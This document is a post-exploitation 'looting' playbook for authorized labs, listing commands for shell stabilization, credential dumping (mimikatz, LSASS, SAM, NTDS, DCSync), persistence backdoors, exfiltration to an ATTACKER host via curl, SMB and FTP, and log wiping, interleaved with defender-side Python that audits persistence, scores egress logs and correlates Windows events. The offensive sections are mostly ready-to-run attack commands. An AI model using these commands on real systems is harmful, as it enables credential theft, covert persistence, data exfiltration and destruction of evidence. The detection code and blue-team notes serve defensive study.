Post-Exploitation & Looting Playbook
Post-Exploitation & Looting Playbook — After the Shell
🧠 Use only in authorized labs or internal training. Once you gain execution or SYSTEM/root, you’re no longer proving exploitation — you’re proving control, visibility, and discipline.
I. 🧭 Core Goals
Stabilize: Convert unstable reverse shell → interactive TTY / PowerShell
Survey: Enumerate OS, network, users, environment
Loot: Dump creds, tokens, keys, configs
Persist: Establish stealthy re-entry
Exfiltrate: Collect proof/data safely
Clean: Remove artifacts, clear tracks
II. 🧩 Shell Stabilization
🐧 Linux
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm; stty raw -echo; fg
🪟 Windows
powershell -ep bypass
[Console]::OutputEncoding = [Text.UTF8Encoding]::UTF8
→ upgrade to Evil-WinRM, PsExec, or WMIExec for persistence.
III. 🧱 System Survey
Linux: whoami; id; uname -a; hostname
Windows: whoami /all; systeminfo
Linux: ip a; route -n; ss -tulnp
Windows: ipconfig /all; netstat -ano
Linux: cat /etc/passwd; ls /home
Windows: net users; net localgroup administrators
Linux: env; ps aux; crontab -l
Windows: set; tasklist; schtasks /query /fo LIST /v
IV. 💾 Credential Harvesting
🐧 Linux
SSH Keys
find / -name id_rsa 2>/dev/null
History Files
cat ~/.bash_history
Configs
grep -r "password" /etc /var/www /home 2>/dev/null
Databases
cat /var/www/html/config.php
System Shadow
cat /etc/shadow
Saved Tokens
grep -r "token" /home
Crack offline:
john --wordlist=rockyou.txt shadow.hashes
🪟 Windows
LSASS Dump
procdump64.exe -ma lsass.exe lsass.dmp → mimikatz sekurlsa::minidump lsass.dmp
Mimikatz live
privilege::debug → sekurlsa::logonpasswords
SAM/SECURITY/SYSTEM
reg save HKLM\SAM C:\temp\SAM ... secretsdump.py -sam SAM -system SYSTEM LOCAL
Credential Manager
cmdkey /list
Browser Creds
Edge/Chrome SQLite extractions
LSA Secrets
mimikatz lsadump::secrets
🧠 Post-HTB tip: dump creds, compare, and pivot laterally using crackmapexec.
V. 🧰 Token & Ticket Manipulation (Windows)
List current tickets
klist
Dump all tickets
mimikatz kerberos::list /export
Pass-the-Ticket
mimikatz kerberos::ptt ticket.kirbi
Dump NTLM hashes
sekurlsa::msv
DCSync from DC
lsadump::dcsync /user:Administrator
VI. 🧠 Data Mining & Target Discovery
Files of Interest
find / -type f -name "*.bak" -o -name "*.conf"
Databases
MySQL: show databases; MSSQL: xp_cmdshell abuse
Documents / Flags
grep -ri "flag{" /home
Git Repos
.git/config, .git-credentials
Cloud Keys
grep -r "AWS_SECRET_ACCESS_KEY" /home
Memory Dumps
/proc/<pid>/mem extraction
AD Enumeration
net group /domain, Get-NetUser, bloodhound collection
VII. ⚙️ Privilege Persistence
🐧 Linux
Cron
echo "* * * * * root bash /tmp/back.sh" >> /etc/crontab
rc.local
Add payload before exit 0
SSH
Add key to /root/.ssh/authorized_keys
Systemd
Custom service with reverse shell
SUID Shell
cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash
🪟 Windows
Registry Run Key
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "cmd /c C:\backdoor.exe"
Service Creation
sc create Updater binPath= "C:\backdoor.exe"
Scheduled Task
schtasks /create /tn "Updater" /tr "cmd /c backdoor.exe" /sc onlogon /ru SYSTEM
WMI Event Subscription
powershell Invoke-WmiEvent
DLL Hijack
Drop malicious DLL in writable service dir
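The Linux persistence mechanisms above (cron, rc.local, authorized_keys, systemd units, SUID copies) are exactly what a blue-team triage should be able to spot after a lab exercise. The following is an added example, not code from the playbook, that audits each of them from file contents rather than from the live host, so it runs offline; the crontab, rc.local, key, unit and SUID-listing inputs are all constructed for the demo, and the volatile-directory list and "baseline" snapshots are assumptions to tune per environment.

```python
"""Offline audit for the Linux persistence mechanisms listed in section VII.

Added example for defenders, not playbook code. Every function takes file
contents or a path list, so the constructed samples below run without touching
the host; in real triage feed it /etc/crontab and /etc/cron.d/*, /etc/rc.local,
/root/.ssh/authorized_keys, the systemd unit files and the output of
`find / -perm -4000 -type f`.
"""
from typing import Dict, List, Tuple

VOLATILE_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")   # assumed world-writable drop dirs
Finding = Tuple[str, str]                               # (evidence, reason)


def _uses_volatile_dir(text: str) -> bool:
    return any(d in text for d in VOLATILE_DIRS)


def audit_crontab(text: str) -> List[Finding]:
    """System crontab lines (min hour dom mon dow user cmd) whose command lives in a temp dir."""
    out = []
    for raw in text.splitlines():
        line = raw.strip()
        fields = line.split(None, 6)
        if not line or line.startswith("#") or len(fields) < 7 or "=" in fields[0]:
            continue  # blank, comment, too short, or a VAR=value line
        if _uses_volatile_dir(fields[6]):
            out.append((line, "cron job runs from a world-writable directory"))
    return out


def audit_rc_local(text: str) -> List[Finding]:
    """Anything rc.local runs at boot besides the final `exit 0`."""
    out = []
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#") and line != "exit 0":
            out.append((line, "rc.local runs a command at boot; verify it is expected"))
    return out


def audit_authorized_keys(current: str, baseline: str) -> List[str]:
    """Key blobs present now that were absent from the baseline snapshot."""
    def blobs(text: str):
        keys = set()
        for line in text.splitlines():
            parts = line.split()
            for i, tok in enumerate(parts):  # skip any leading option list
                if tok.startswith(("ssh-", "ecdsa-", "sk-")) and i + 1 < len(parts):
                    keys.add(parts[i + 1])
                    break
        return keys
    return sorted(blobs(current) - blobs(baseline))


def audit_systemd_units(units: Dict[str, str]) -> List[Finding]:
    """Unit files whose ExecStart points into a temp dir."""
    out = []
    for name, text in units.items():
        for raw in text.splitlines():
            line = raw.strip()
            if line.startswith("ExecStart=") and _uses_volatile_dir(line):
                out.append((f"{name}: {line}", "service starts a binary from a volatile directory"))
    return out


def audit_suid(paths: List[str], baseline: List[str]) -> List[Finding]:
    """SUID binaries that were not in the baseline listing."""
    known = set(baseline)
    return [(p, "new SUID binary" + (" in a volatile directory" if _uses_volatile_dir(p) else ""))
            for p in paths if p not in known]


# Constructed inputs mirroring the section VII techniques (not real host data).
SAMPLE_CRONTAB = ("SHELL=/bin/sh\n"
                  "17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly\n"
                  "* * * * * root bash /tmp/back.sh\n")
SAMPLE_RC_LOCAL = "#!/bin/sh -e\n# rc.local\nbash /tmp/back.sh &\nexit 0\n"
BASELINE_KEYS = "ssh-ed25519 AAAAC3CONSTRUCTEDBASELINEKEY admin@bastion\n"
CURRENT_KEYS = BASELINE_KEYS + 'no-pty,command="/bin/sh" ssh-rsa AAAAB3CONSTRUCTEDNEWKEY unknown\n'
SAMPLE_UNITS = {
    "updater.service": "[Service]\nExecStart=/bin/bash /tmp/back.sh\n[Install]\nWantedBy=multi-user.target\n",
    "cron.service": "[Service]\nExecStart=/usr/sbin/cron -f\n",
}
SAMPLE_SUID = ["/usr/bin/sudo", "/usr/bin/passwd", "/tmp/rootbash"]
BASELINE_SUID = ["/usr/bin/sudo", "/usr/bin/passwd"]


def run_audit() -> Dict[str, list]:
    """Run every check over the constructed samples and group findings by area."""
    return {
        "cron": audit_crontab(SAMPLE_CRONTAB),
        "rc_local": audit_rc_local(SAMPLE_RC_LOCAL),
        "ssh_keys": audit_authorized_keys(CURRENT_KEYS, BASELINE_KEYS),
        "systemd": audit_systemd_units(SAMPLE_UNITS),
        "suid": audit_suid(SAMPLE_SUID, BASELINE_SUID),
    }


if __name__ == "__main__":
    for area, findings in run_audit().items():
        print(area, findings)
```

The baseline-diff approach for authorized_keys and SUID binaries is deliberate: a list of "known good" captured before the exercise is far more reliable than pattern-matching on what an intruder might name things, and it is the same comparison an auditd PATH watch on those files lets you make over time.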
VIII. 🧱 Data Exfiltration (Tame & Stealthy)
HTTP POST
curl -X POST -d @/etc/passwd http://ATTACKER:8000/upload
SMB
copy C:\loot\file.txt \\ATTACKER\share
Base64 + HTTP
cat proof.txt
FTP
echo open ATTACKER > /tmp/x.ftp; echo put file >> /tmp/x.ftp; ftp -n -s:/tmp/x.ftp
Email (lab)
sendmail < payload
Encrypted Zip
zip -r -e loot.zip loot/
🧠 Keep proof.txt, root.txt, screenshots, and command logs only.
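Every channel in this section leaves a trace on the egress path, and the detection table later on the page summarises it as "large POST requests" on the proxy or IDS. The following added example (defender-side code, not part of the playbook) scores proxy log records for upload-like behaviour: large request bodies, bare-IP destinations, non-standard ports, and per-source upload volume over the log window. The log line format (timestamp, source IP, method, URL, status, request bytes) and the byte thresholds are constructed for the demo; map them onto your proxy's real fields.

```python
"""Score egress proxy records for the 'large POST requests' exfil indicator.

Added example for defenders, not playbook code. Log lines are constructed in a
simple space-separated layout (ts src method url status bytes_in); adapt
parse_line() to the real proxy format. Thresholds are assumed policy values.
"""
from collections import defaultdict
from urllib.parse import urlparse
import ipaddress

BIG_POST_BYTES = 1_000_000            # single request body worth a look (assumed)
PER_SOURCE_WINDOW_BYTES = 5_000_000   # total uploaded per source over the window (assumed)
STANDARD_PORTS = {80, 443}
UPLOAD_METHODS = ("POST", "PUT")


def parse_line(line: str) -> dict:
    ts, src, method, url, status, bytes_in = line.split()
    return {"ts": ts, "src": src, "method": method, "url": url,
            "status": int(status), "bytes_in": int(bytes_in)}


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def score_request(rec: dict) -> list:
    """Reasons a single request looks like a file upload worth review."""
    reasons = []
    if rec["method"] not in UPLOAD_METHODS:
        return reasons
    u = urlparse(rec["url"])
    port = u.port or (443 if u.scheme == "https" else 80)
    if rec["bytes_in"] >= BIG_POST_BYTES:
        reasons.append("large request body")
    if is_ip_literal(u.hostname or ""):
        reasons.append("destination is a bare IP")
    if port not in STANDARD_PORTS:
        reasons.append(f"non-standard port {port}")
    return reasons


def analyse(lines):
    """Return (flagged requests, sources exceeding the per-window upload budget)."""
    per_src_bytes = defaultdict(int)
    flagged = []
    for line in lines:
        rec = parse_line(line)
        if rec["method"] in UPLOAD_METHODS:
            per_src_bytes[rec["src"]] += rec["bytes_in"]
        reasons = score_request(rec)
        if reasons:
            flagged.append((rec["src"], rec["url"], reasons))
    heavy = sorted(s for s, b in per_src_bytes.items() if b >= PER_SOURCE_WINDOW_BYTES)
    return flagged, heavy


# Constructed sample log: normal browsing plus two uploads to a bare IP on port 8000.
SAMPLE_LOG = [
    "2024-01-01T10:00:01 10.0.0.5 GET https://www.example.com/ 200 0",
    "2024-01-01T10:00:05 10.0.0.5 POST https://www.example.com/api/login 200 512",
    "2024-01-01T10:02:10 10.0.0.7 POST http://203.0.113.10:8000/upload 200 2400000",
    "2024-01-01T10:03:40 10.0.0.7 POST http://203.0.113.10:8000/upload 200 3100000",
    "2024-01-01T10:05:00 10.0.0.9 PUT https://files.example.com/report.pdf 201 1500000",
]

if __name__ == "__main__":
    flagged, heavy = analyse(SAMPLE_LOG)
    for src, url, reasons in flagged:
        print(src, url, "; ".join(reasons))
    print("heavy uploaders:", heavy)
```

The per-source total matters as much as any single request: splitting loot into many small POSTs defeats a body-size threshold but not a volume budget per client.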
IX. 🧰 Forensics & Evidence Collection
Process List
Linux: ps aux
Windows: tasklist /v
Network Conns
Linux: ss -tulnp
Windows: netstat -ano
Installed Software
Linux: dpkg -l
Windows: wmic product get name,version
System Logs
Linux: /var/log/syslog, /var/log/auth.log
Windows: eventvwr.msc, Get-EventLog
User Activity
Linux: .bash_history
Windows: Prefetch, SRUM, Shimcache
X. 🧠 Post-Domain Loot (Enterprise Labs)
NTDS.dit
ntdsutil "activate instance ntds" "ifm" "create full C:\temp\ntds" quit
SYSVOL GPP
\\DC\SYSVOL\domain\Policies\*\Machine\Preferences\Groups.xml
LAPS
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd
ADCS Templates
certipy find -u user -p pass
Domain Tickets
Rubeus dump
Group Policy Loot
parse with gpp-decrypt
XI. 🧩 Cleanup & Cover Tracks
Temp Files
rm -rf /tmp/*
del /f /q %TEMP%\*
Logs
> /var/log/auth.log
wevtutil cl System
Artifacts
unset HISTFILE
delete dropped binaries
Persistence
remove crons, tasks
remove Run keys
Tunnels
kill chisel/socat
netsh interface portproxy reset all
Clean only on sandbox/CTF machines — never in live audits without explicit authorization.
XII. 🧰 Quick One-Liners
Dump all passwords (Windows)
mimikatz "sekurlsa::logonpasswords"
Find creds in files (Linux)
grep -ri "pass" /etc /home
List scheduled tasks
schtasks /query /fo LIST /v
Check sudo rights
sudo -l
Find writable dirs
find / -writable -type d 2>/dev/null
Enumerate network
ip a && arp -a
XIII. 🧱 Reporting & Documentation Best Practice
Keep /notes/post_exploitation.md per box with these fields:
Foothold Vector:
PrivEsc Path:
Creds Looted:
Persistence Set:
Exfil Steps:
Cleanup Done:
Screenshot every flag & sensitive file path.
Include hashes, commands, timestamps.
Summarize mitigation steps for blue-team understanding.
XIV. 🔒 Detection & Blue Notes (Correlated Visibility)
Technique: log source, indicator
LSASS dump: Sysmon, Event ID 10 (ProcessAccess)
SAM/NTDS read: Security, Event ID 4662 (Get Changes)
Mimikatz exec: Defender / AMSI, alert signature
WMI persistence: WMI-Activity log, Event 5858
Scheduled task create: Security, Event ID 4698
Registry Run key: Sysmon, Event ID 13 (Registry Value Set)
SSH key mod: auditd, PATH write event
File exfil: Proxy / IDS, large POST requests
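The table above maps each looting and persistence step to a single event, but the value for the blue team is in correlating them per host. The following added example (defender-side code, not from the playbook) implements the Windows rows as rules over event records and groups the hits by host. The event dicts are constructed; their field names follow the real Sysmon, Security and WMI-Activity schemas, but every host, path and user value is made up. The two replication control-access-right GUIDs are the real DS-Replication-Get-Changes and DS-Replication-Get-Changes-All values; the lsass allowlist is an assumed baseline to tune per estate; and the WMI rule keys on Event 5861 in the WMI-Activity/Operational log, which records a new permanent event consumer binding, rather than the 5858 cited in the table.

```python
"""Correlate the Windows rows of the detection table above, per host.

Added example for defenders, not playbook code. Event records are constructed
dicts with field names taken from the real Sysmon / Security / WMI-Activity
event schemas; hosts, paths and users are invented for the demo.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Control-access-right GUIDs that appear in 4662 'Properties' for directory
# replication (DS-Replication-Get-Changes / DS-Replication-Get-Changes-All).
REPLICATION_RIGHTS = ("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                      "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")
PROCESS_VM_READ = 0x0010                    # access bit needed to read another process's memory
RUN_KEY = "\\microsoft\\windows\\currentversion\\run\\"
LSASS_ALLOWLIST = {                         # assumed baseline of legitimate lsass readers
    "c:\\windows\\system32\\csrss.exe",
    "c:\\windows\\system32\\wininit.exe",
}


@dataclass
class Finding:
    technique: str
    host: str
    detail: str


def check_event(ev: dict) -> Optional[Finding]:
    """Return a Finding when one event matches a row of the detection table."""
    channel, event_id, host = ev["channel"], ev["event_id"], ev["host"]
    if channel == "Sysmon" and event_id == 10:            # ProcessAccess
        source, target = ev["SourceImage"].lower(), ev["TargetImage"].lower()
        granted = int(ev["GrantedAccess"], 16)
        if (target.endswith("\\lsass.exe") and granted & PROCESS_VM_READ
                and source not in LSASS_ALLOWLIST):
            return Finding("LSASS memory access", host,
                           f"{source} GrantedAccess={ev['GrantedAccess']}")
    elif channel == "Sysmon" and event_id == 13:          # Registry value set
        if RUN_KEY in ev["TargetObject"].lower():
            return Finding("Registry Run key persistence", host,
                           f"{ev['TargetObject']} = {ev['Details']}")
    elif channel == "Security" and event_id == 4662:      # operation on an AD object
        if any(g in ev["Properties"].lower() for g in REPLICATION_RIGHTS):
            return Finding("Directory replication request", host,
                           f"subject={ev['SubjectUserName']}")
    elif channel == "Security" and event_id == 4698:      # scheduled task created
        return Finding("Scheduled task created", host,
                       f"{ev['TaskName']} by {ev['SubjectUserName']}")
    elif channel == "Microsoft-Windows-WMI-Activity/Operational" and event_id == 5861:
        return Finding("WMI permanent event subscription", host, ev["Consumer"])
    return None


def correlate(events) -> Dict[str, List[str]]:
    """Group matched techniques per host so a multi-stage intrusion stands out."""
    per_host: Dict[str, List[str]] = {}
    for ev in events:
        f = check_event(ev)
        if f:
            per_host.setdefault(f.host, []).append(f.technique)
    return per_host


# Constructed telemetry: benign noise mixed with the patterns from the table.
SAMPLE_EVENTS = [
    {"channel": "Sysmon", "event_id": 10, "host": "WS01",
     "SourceImage": "C:\\Windows\\System32\\csrss.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1000"},
    {"channel": "Sysmon", "event_id": 10, "host": "WS01",
     "SourceImage": "C:\\Users\\Public\\procdump64.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"channel": "Sysmon", "event_id": 13, "host": "WS01",
     "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "Details": "cmd /c C:\\backdoor.exe"},
    {"channel": "Sysmon", "event_id": 13, "host": "WS01",
     "TargetObject": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer\\NoDriveTypeAutoRun",
     "Details": "DWORD (0x000000ff)"},
    {"channel": "Security", "event_id": 4698, "host": "WS01",
     "TaskName": "\\Updater", "SubjectUserName": "jdoe"},
    {"channel": "Security", "event_id": 4662, "host": "DC01", "SubjectUserName": "jdoe",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"channel": "Security", "event_id": 4662, "host": "DC01", "SubjectUserName": "DC01$",
     "Properties": "{00000000-0000-0000-0000-000000000000}"},   # placeholder non-replication property
    {"channel": "Microsoft-Windows-WMI-Activity/Operational", "event_id": 5861, "host": "WS01",
     "Consumer": 'CommandLineEventConsumer.Name="Updater"'},
]

if __name__ == "__main__":
    for host, techniques in correlate(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(techniques))
```

Four distinct rows firing on one workstation within a short window is a much stronger signal than any of them alone; in a SIEM the same grouping would be keyed on host plus a time bucket.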
XV. 🧠 Full Post-Exploitation Flow
1️⃣ Stabilize shell (TTY / PowerShell)
2️⃣ Enumerate host & network
3️⃣ Dump creds & tokens
4️⃣ Escalate privileges if possible
5️⃣ Enumerate shares / data / configs
6️⃣ Establish persistence (controlled)
7️⃣ Exfil minimal proof data
8️⃣ Clean artifacts & document steps